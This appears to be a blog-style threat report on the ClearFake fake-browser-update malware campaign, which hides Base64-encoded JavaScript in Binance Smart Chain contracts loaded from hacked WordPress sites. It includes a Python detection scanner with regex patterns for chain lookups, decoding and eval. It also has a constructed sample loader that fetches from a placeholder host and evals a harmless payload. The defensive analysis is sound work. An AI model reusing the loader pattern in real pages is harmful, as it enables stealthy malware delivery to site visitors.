ClearFake Malware Campaign

Malware With Novel Technique “Ether Hide”

KanakSasak
6 min read · Sep 19, 2024

Introduction

On August 26, 2023, cybersecurity researcher Randy McEoin shared a report about a new malicious JavaScript framework found on hacked websites, designed to spread malware through drive-by downloads. The malware, named ClearFake, got its name because the early versions had clear text JavaScript code injected into the compromised sites, unlike most JavaScript malware, which is usually hidden or obfuscated.

ClearFake is similar to other “fake updates” scams, like SocGholish and FakeSG, which use social engineering to trick users into installing a fake browser update. By combining this tactic with the watering hole technique, the attackers behind ClearFake target a broad audience, making their malware campaigns more effective and widespread.

Based on our monitoring and customer feedback, we noticed a spike in traffic to ClearFake’s servers in late September 2023. Around the same time, we also found hundreds of websites that had been infected by ClearFake.

In September 2023, Malwarebytes uncovered a campaign involving Atomic Stealer that used fake Google ads to trick macOS users. People searching for the financial charting software, TradingView, were misled into downloading this malware instead.

ClearFake, on the other hand, is a newer operation that uses hacked WordPress sites to show fake browser update messages. The goal is to convince users to download malware like stealers or other harmful programs.

This tactic is similar to what other known groups like TA569 (also called SocGholish), RogueRaticate (FakeSG), ZPHP (SmartApeSG), and EtherHiding have done, all of whom use fake browser updates as a way to spread their malware.

Malware Stage

Here is an overview of the stages of the infection chains observed distributing commodity malware via ClearFake:

ClearFake leverages blockchain technology through the EtherHiding technique, specifically the Binance Smart Chain, to store and deliver malicious payloads. In this approach, ClearFake embeds obfuscated JavaScript within smart contracts deployed on the blockchain. These smart contracts serve as an immutable, decentralized repository for malware code, making it difficult for traditional security systems to block or detect. The injected loader retrieves the encoded payload from the blockchain, decodes it from Base64, and then executes it, effectively bypassing content filtering and blacklists by relying on legitimate blockchain infrastructure.

Novel Technique “Ether Hide”

Cybercriminals have come up with a new way to spread malicious code called “EtherHiding,” which involves using Binance’s Smart Chain (BSC) contracts to hide parts of the malicious code within the blockchain. To insert harmful JavaScript into blockchain systems, the attackers used hacked WordPress sites that redirect traffic to Cloudflare Worker hosts, allowing them to distribute the malware more stealthily.

According to Guardio Labs, the attack works by defacing a site with a convincing overlay that urges users to update their browser before they can proceed. However, this “update” actually installs dangerous infostealer malware like RedLine, Amadey, or Lumma.

Below is the script injected into the victim site.

Decoded Base64 payload

A breakdown of the technique known as “EtherHiding” was shared by security researchers at Guardio Labs in an Oct. 15 report, explaining that the attack involves compromising WordPress websites by injecting code that retrieves partial payloads from the blockchain contracts.

The attackers hide the payloads in BSC smart contracts, essentially serving as anonymous free hosting platforms for them.

Hackers can easily update their code and change attack methods whenever they want. Recently, they’ve been using fake browser updates to trick victims, where people are led to fake landing pages and links, prompting them to “update” their browsers. The malicious payload includes JavaScript that pulls additional code from the attackers’ servers, eventually leading to complete site defacement with fake browser update notices that deliver malware.

This method lets attackers adjust the attack by swapping out the malicious code with each new blockchain transaction, making it harder to stop, according to Nati Tal, head of cybersecurity at Guardio Labs, and researcher Oleg Zaytsev. Once these infected smart contracts are set up, they run on their own, leaving Binance to rely on its developer community to flag malicious code in contracts when it is found.

We can see this in the transactions history on the BSC, starting on contract creation on the 9th of September 2023 by another attacker-controlled address. That other address, created in late June 2022, was loaded with BNB (The Binance Coin) in an amount just enough to create and update the contract — activities that are not actually payable, yet do cost some minor customary “gas” fees (between 0.02 to 0.60 USD each):

Only the first update of the contract is clearly a test (it actually contained only the string “test”), but all the following updates are obvious pieces of JavaScript code. While the first entries are quite simple, the later ones add more JavaScript obfuscation techniques but keep performing the same few simple activities seen in this first entry (after decoding from Base64):
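The loader pattern described above (a chain lookup, a Base64 decode step and dynamic execution in one inline script) can be turned into a page-scanning heuristic. The following is an added example written for this article, not code from the original post or from any of the cited reports; the regexes, the `bsc-dataseed` hostname fragment, and the sample page with its placeholder contract address and payload are assumptions constructed for the demonstration.

```python
import re
import base64

# Heuristic indicators of an EtherHiding-style loader (assumption: heuristic, not a vendor signature):
# a blockchain lookup, a Base64 decode step and dynamic code execution all in one inline script.
CHAIN_RE = re.compile(r"bsc-dataseed|eth_call|0x[0-9a-fA-F]{40}")
DECODE_RE = re.compile(r"\batob\(|base64")
EXEC_RE = re.compile(r"\beval\(|new Function\(|\.appendChild\(|document\.write\(")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def decode_blobs(script):
    """Base64-decode every long Base64-looking run that yields printable UTF-8 text."""
    decoded = []
    for blob in B64_RE.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # hex addresses and random tokens fail here and are skipped
        if text.isprintable():
            decoded.append(text)
    return decoded

def scan_page(html):
    """Return one finding per inline script that looks up, decodes and executes chain-hosted code."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        hits = {
            "chain_lookup": bool(CHAIN_RE.search(script)),
            "decode": bool(DECODE_RE.search(script)),
            "execute": bool(EXEC_RE.search(script)),
        }
        if all(hits.values()):
            findings.append({"indicators": hits, "decoded": decode_blobs(script)})
    return findings

# Constructed sample page: one benign script plus a loader shaped like the one described above.
# The RPC host, contract address and payload are placeholders, not values from any real campaign.
SAMPLE_HTML = """<html><body>
<script>console.log("site analytics");</script>
<script>
const rpc = "https://bsc-dataseed.example/";
const contract = "0x0000000000000000000000000000000000000000";
fetch(rpc, {method: "POST", body: JSON.stringify({method: "eth_call", params: [{to: contract}]})})
  .then(r => r.json())
  .then(() => eval(atob("Y29uc29sZS5sb2coJ3BsYWNlaG9sZGVyJyk=")));
</script>
</body></html>"""
```

Calling `scan_page(SAMPLE_HTML)` flags only the second script and returns the decoded placeholder payload, while the analytics script produces no finding.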

Once the infected smart contracts are deployed, they operate autonomously. All Binance can do is rely on its developer community to flag malicious code in contracts upon discovery.

Threat Actor

The Diamond Model of Intrusion Analysis is a framework used in cybersecurity to help analysts understand and describe cyber threats. It provides a structured way to analyze intrusions by focusing on four key elements, often referred to as “vertices,” that form the shape of a diamond. These elements are Adversary, Infrastructure, Capability, and Victim.

Based on the Diamond Model analysis shared by Bridewell, the suspected threat actor is TA569. Who is this threat actor?

TA569

TA569 is a prolific threat actor primarily known for its deployment of website injections leading to a JavaScript payload known as SocGholish. In the past few months, Proofpoint researchers have observed changes in the tactics, techniques, and procedures (TTPs) employed by TA569. Changes include an increase in the quantity of injection varieties, as well as payloads deviating from the standard SocGholish “Fake Update” JavaScript packages. Such changes, and the frequency of said changes, are likely in response to two things: efficacy data collected during the attack chain and profitability. This threat actor is financially motivated.
